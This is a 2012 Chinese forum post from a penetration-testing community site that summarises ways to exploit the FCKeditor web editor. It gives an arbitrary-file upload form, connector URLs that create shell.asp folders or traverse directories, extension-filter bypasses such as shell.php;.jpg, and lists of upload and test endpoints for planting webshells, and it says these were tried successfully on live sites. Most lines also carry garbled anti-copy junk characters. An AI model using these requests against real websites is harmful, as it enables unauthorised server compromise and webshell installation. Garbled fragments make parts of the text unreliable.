中国网络渗透测试联盟

标题: Fckeditor漏洞 (2) [打印本页]
作者: admin    时间: 2012-9-13 17:01
标题: Fckeditor漏洞 (2)
Fckeditor漏洞利用总结  & T+ `2 F7 g1 Q+ k" ?  L; s4 S9 ^
查看编辑器版本4 h( j0 h; Z0 w
FCKeditor/_whatsnew.html
* ^% O* W; C* i0 Y2 @—————————————————————————————————————————————————————————————/ ~( R9 N9 L3 X# L4 {' G  ^

( c3 J; R" a$ x3 U/ ]; G2. Version 2.2 版本2 u5 A& i( F' `) u0 D
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
( J# |' C' r# I3 J1 k; h( M" _—————————————————————————————————————————————————————————————7 K5 ]. b" J1 @* E* N" s8 N
  _- X+ i0 {( v5 G4 c$ ^0 a
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
4 ]5 J5 L* e7 u4 b. s  g* d<form id="frmUpload" enctype="multipart/form-data"5 E3 B1 X6 D  A( v5 @) _" z
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
0 {: ?6 Z& m0 I5 f<input type="file" name="NewFile" size="50"><br># G) ^* O1 N& f& o+ ]3 D
<input id="btnUpload" type="submit" value="Upload">
$ u. }2 H) C! x2 o1 z  N) d</form>
! ]. u- i9 }. y( W( g0 H—————————————————————————————————————————————————————————————* N1 l+ U( k/ Y, F. U

8 G3 ^; ^0 B; {  Q7 M$ q% i/ l4.FCKeditor 文件上传“.”变“_”下划线的绕过方法. `& |, ?: e. e0 G9 R3 u/ X+ |
        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
: |: V( @8 a6 m6 [    4.1:提交shell.php+空格绕过0 }; Z: i5 k6 u  M- }- o$ w
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
, z" F; v! P2 i- P# U7 b/ O4 V5 {    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。3 l+ Z; {5 F7 {
—————————————————————————————————————————————————————————————
' J& D+ |. }2 ^4 G' x! C9 w3 q3 c' X7 u( t8 ^
5. 突破建立文件夹
# n0 b0 Z  y7 `; |1 v! gFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
5 i& }1 ^- p  fFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp) N% \! _( i# e! c: g9 e) X
—————————————————————————————————————————————————————————————
( h; ^2 p2 m  U% v6 z( e5 `9 X4 a  D
6. FCKeditor 中test 文件的上传地址
4 C$ X" P! s: h: fFCKeditor/editor/filemanager/browser/default/connectors/test.html3 `2 M& I/ z" l' T6 M- b% ?9 O: ^& @, h( t
FCKeditor/editor/filemanager/upload/test.html
. J1 |5 z2 k" w1 N8 J/ I* {FCKeditor/editor/filemanager/connectors/test.html
7 T/ H& R" L& `/ \2 w/ q, }' dFCKeditor/editor/filemanager/connectors/uploadtest.html
5 h; O. f! \1 b: x—————————————————————————————————————————————————————————————
9 C$ i4 c# [( A
: l. b: O( m3 z7.常用上传地址  H( V2 S6 h8 f* o, P+ o
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/- S' B" o# e- z/ X; v  N
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
: G. F. e3 d3 E: Y7 i# fFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
& m% G: e8 P, W7 UJSP 版:
1 z4 o4 H, D( w0 @% W5 ?2 u3 o* \FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp) v8 c  H  L6 O3 B. a8 `3 h
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
& [1 J! \3 S) `. i件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
" e- D1 I: c: R—————————————————————————————————————————————————————————————6 q" z! K! y! B4 J0 u7 T9 r
& @# s7 ?2 L* @- U) m/ J
8.其他上传地址
. w" T0 L' }! m* P" T* ^$ @( [FCKeditor/_samples/default.html
0 Q4 p, `7 h& _5 A8 `" d' t% m" n4 Y3 rFCKeditor/_samples/asp/sample01.asp8 V* O7 r: @3 T0 Z) U) O
FCKeditor/_samples/asp/sample02.asp' _+ \2 k3 N5 G' Q! g: c
FCKeditor/_samples/asp/sample03.asp
) n, e/ B* k) D2 ~' y* ?( E: V9 ZFCKeditor/_samples/asp/sample04.asp% _8 ~9 i  H& }! X; }
一般很多站点都已删除_samples 目录,可以试试。; B2 k, o+ g8 k! C$ a1 }5 z' k( N
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
2 p# P) h7 D& E+ o; m—————————————————————————————————————————————————————————————  [& G9 }, K' _, `6 P

* p8 _- \1 M$ B% |8 c0 ~4 N3 y9.列目录漏洞也可助找上传地址
8 o3 k. w2 x( E. ~- iVersion 2.4.1 测试通过
2 N0 l4 v; Z* g  i9 C修改CurrentFolder 参数使用 ../../来进入不同的目录. J  A$ k9 D# R) w' D
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp$ x. I. x5 C# L$ ]) [
根据返回的XML 信息可以查看网站所有的目录。
; V$ e0 R! N; w' @FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F9 ]8 ]* a2 P  }8 F. `) @. e
也可以直接浏览盘符:
9 l+ L- s+ v8 ~3 k4 b6 ZJSP 版本:
3 t5 ]' H; K8 @* g$ xFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
( e0 T+ j& v. m0 [—————————————————————————————————————————————————————————————1 w' p# J7 v$ Y1 A
3 W* P. [: Q" u7 P& q6 E
10.爆路径漏洞
1 S4 c$ q6 y- G9 O1 c& r( eFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp9 M4 i  e* {  o5 g' k. V2 ]
—————————————————————————————————————————————————————————————3 e/ M: o+ V  T" @- J5 E& o& J
# Q- p8 o& O2 C5 z8 H3 U2 M2 O: I! d
11. FCKeditor 被动限制策略所导致的过滤不严问题
. \5 }# a5 v8 @, S9 @        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
' N# v% T- l$ l( h$ U) Z脆弱描述:# f4 J& [! r6 L
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:0 [* W; C# H! t; f
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
3 a' M/ o( i& j4 n0 {& @Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
2 G# C  ]6 q+ \% s: }' d. b$ D        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。3 H) G+ O( N3 d' A7 _' A$ A
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!( q8 H" F$ _, b. v; g
—————————————————————————————————————————————————————————————7 p2 b# g' O, E- S$ d; {$ b  d

) i  j: k2 i" I1 b. d( J4 G12.最古老的漏洞,Type文件没有限制!6 U( F8 Q- g$ X2 `9 w. p: ?7 d1 ~" L
        我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
$ {" U3 y) v" L3 Q! |) O$ o5 G—————————————————————————————————————————————————————————————
4 c0 o1 j; B3 ]% P  `! l  q
  B0 c; U8 w4 }# \9 c" s' H===============================================================================================================================================% F( y( ]$ l5 X& J
0 _- H3 G/ ?* M0 K( n
FCK编辑器jsp版本漏洞:& q* R. @' r" J$ Y
. D: J) D1 a4 W! c

' p9 s. Q3 ?' `1 D! F7 _! z6 Chttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
0 M# A9 Y" {& O7 \9 }1 g  S1 K5 T  e: N
上传马所在目录7 K6 r! ]+ _* L  T' R5 s
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
+ ^( q* [- ^0 F0 M/ C上传shell的地址:; H4 B4 s2 X  r8 z: p5 T: J
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector, C6 a% P/ c" ]4 \2 L
跟版本有关系.并不是百分百成功. 测试成功几个站.0 [% {& Q7 [1 ]% y& }1 `
不能通杀.很遗憾.
2 r1 q2 b6 d2 qhttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector% i" X  k+ m, n
如果以上地址不行可以试试2 h1 V$ f4 f/ E2 {' O- m
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
4 D- `+ Y5 {7 L: WFCKeditor/_samples/5 l$ j1 X( G7 P
FCKeditor/_samples/default.html
; p" l. F; o& l+ ]! }FCKeditor/editor/fckeditor.htm, p3 K. [, k  b: v' m
FCKeditor/editor/fckdialog.html
9 Q+ m, o" Y% }) u. `7 w2 [8 T7 @$ k' Z% J; `6 I9 R, L
1 M! j  J; u4 g5 z/ v
) t" T  v- b% s# W8 g0 i: O8 \
解析漏洞+未重命名文件时上传漏洞  1.asp;jpg+ L3 {2 S+ s# x4 {) D% v




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2